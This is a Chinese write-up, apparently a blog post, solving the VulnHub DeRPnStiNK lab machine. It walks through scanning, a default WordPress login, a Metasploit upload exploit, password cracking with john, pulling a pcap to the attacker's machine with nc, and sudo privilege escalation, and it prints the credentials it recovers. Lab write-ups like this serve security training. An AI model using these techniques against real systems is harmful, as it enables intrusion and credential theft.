7-Vulnhub-DeRPnStiNK

VulnHub-DeRPnStiNK

靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/

目标:得到root权限&找到四个flag.txt
作者:尼德霍格007
时间:2021-7-19

信息收集

漏洞复现环境使用vmware虚拟机,kali机与靶机都使用NAT网络

kali扫描目标主机ip地址

nmap -sP 192.168.21.0/24

image-20210718220159851

扫描靶机开放的1-10000的端口

nmap -A -p 1-10000 192.168.21.143

image-20210718220738885

可以看到目标机开放了21,22和80端口,分别对应FTP,SSH,和HTTP服务

访问HTTP服务,一个胖子和一个瘦子

image-20210718221102002

获得flag1

查看网页源码,找到flag1

image-20210718221229364

源码中还提示了个信息

image-20210718221355931

查看一下

image-20210718221434832

<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->

翻译一下就是要更新本地DNS服务器,才能访问博客

image-20210718221549369

但没说怎么更新,先放一边

爆破一下目录

dirb http://192.168.21.143/

image-20210718222545424

发现一个weblog目录,访问一下

image-20210718222656103

显示的是derpnstink.local/weblog

所以可能就是把derpnstink.local写入本地hosts文件,Linux的hosts文件在/etc目录下

image-20210718222006775

写入后保存退出

然后还有一个robots.txt

image-20210718223127612

image-20210718223207283

提示俩目录,看一下

image-20210718223321084

image-20210718223341925

没有有用信息

访问这个博客

image-20210718223645228

image-20210719002556212

看到此页面和底部的显示以及刚才使用dirb暴力破解的结果中含有wp-等相关字样,根据经验可知目标是个wordpress博客,所以直接尝试访问默认的管理员wp-admin页面看看

访问

http://derpnstink.local/weblog/wp-admin

填入admin/admin

image-20210718223819409

成功登录

image-20210718223933152

找了一会儿发现这个用户并不是真正的管理员,权限不高,只能管理幻灯片的播放

使用wpsan扫描一下看看

wpscan --url http://derpnstink.local/weblog/ 

image-20210718224604001

Slideshow Gallery存在漏洞,可以利用一下

getShell

使用msf查询一下有没有可利用漏洞

image-20210718225054353

找到两个相关的,第二个可以利用

use exploit/unix/webapp/wp_slideshowgallery_upload

配置选项里面有需要配置账号和密码,这里刚好在上面测试出来默认账号和密码都是admin,所以这里很好利用,命令如下(我这里1处打错了,2是正确的)

image-20210718225638985

image-20210718230220091

这里成功获得一个shell,但不是完整的shell,我们继续

shell

执行

python -c 'import pty; pty.spawn("/bin/bash")'

获得tty

image-20210718230021520

进入web所在目录下查看配置文件

image-20210718230707035

发现mysql数据库用户名是root,密码是mysql

连接mysql

mysql -u root -pmysql

image-20210718230836136

前面发现过一个mysql的管理界面,通过mysql账号密码登陆去看看

image-20210718231149427

发现flag2

在这里发现了第二个flag

image-20210718231253042

在wp-user表中发现了第二个用户unclestinky,密码是加密过的

image-20210718231505282

使用linux自带的john破解一下明文

先将密码存储到文件中

$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41

image-20210718231700902

使用john破解密码

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

没有这个rockyou.txt库的,可以去github下载

image-20210718232402965

输出破解过的密码

image-20210718232418980

账户unclestinky密码wedgie57登陆

进来后看到了之前见过的flag2

(img-Gog8Elrl-1626627428441)

继续找

image-20210718232858269

在home下发现两个用户

试试用刚得到的密码wedgie57来SSH或者FTP登陆这两个账户,

SSH登陆

image-20210718233240380

发现ssh不支持密码密码登陆,只可以通过指纹登陆

FTP登陆

image-20210718233516836

使用mrderp登陆提示错误530,意思是没有这个用户,换用stinky/wedgie57

登陆成功,切换到web视图

image-20210718234008611

在network-logs目录下发现一个文件,中有一段对话,提示说修改密码的时候,进行了抓包

image-20210718234246215

在ftp://192.168.21.143/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/中找到了key秘钥

image-20210718234419879

下载下来,使用key登陆

ssh -i key.txt stinky@192.168.21.143

image-20210718234806763

提示权限不足,加权限

chmod 400 key.txt

image-20210718235004562

登陆成功

获得flag3

image-20210718235107487

继续找flag4

在Documents目录下发现了应该是刚刚在对话中提到的流量包

image-20210718235221415

下载下来,用wireshark查看

先kali执行:nc -l -p 4444 > derp.pcap 
然后目标靶机执行:nc 192.168.21.128 4444 < derpissues.pcap

192.168.21.128是我kali机的ip地址

image-20210718235947014

image-20210718235958270

wireshark打开

image-20210719000026877

太多了,http过滤一下

image-20210719000255399

找了半天终于找到了,密码derpderpderpderpderpderpderp

登录

ssh mrderp@192.168.21.143

image-20210719000417993

成功登录

image-20210719000549557

提权

这里提示访问https://pastebin.com/RzK9WfGw

image-20210719000645168

提示 mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

大概意思:
允许mrderp用户在主机上以root用户权限读写执行/home/mrderp/binaries/目录下derpy开头的文件

image-20210719000751586

按照提示创建mrderp目录和derpy文件

image-20210719001604804

image-20210719001632107

image-20210719001645830

image-20210719001737467

image-20210719001805444

得到flag4

运行derpy.sh后提权成功

image-20210719001948588

在/root/Desktop目录下找到flag4

总结

这次的漏洞复现还是挺难得,跟着教程走还做了将近3小时,主要是这次在HTTP,SSH和FTP之间来回跳转让我感觉很有挑战性,还有路径爆破,wp-scan扫描,漏洞利用等让我学到很多之前没用过的东西,难度的提升才能让我进步的更快,加油!

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼德霍格007

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值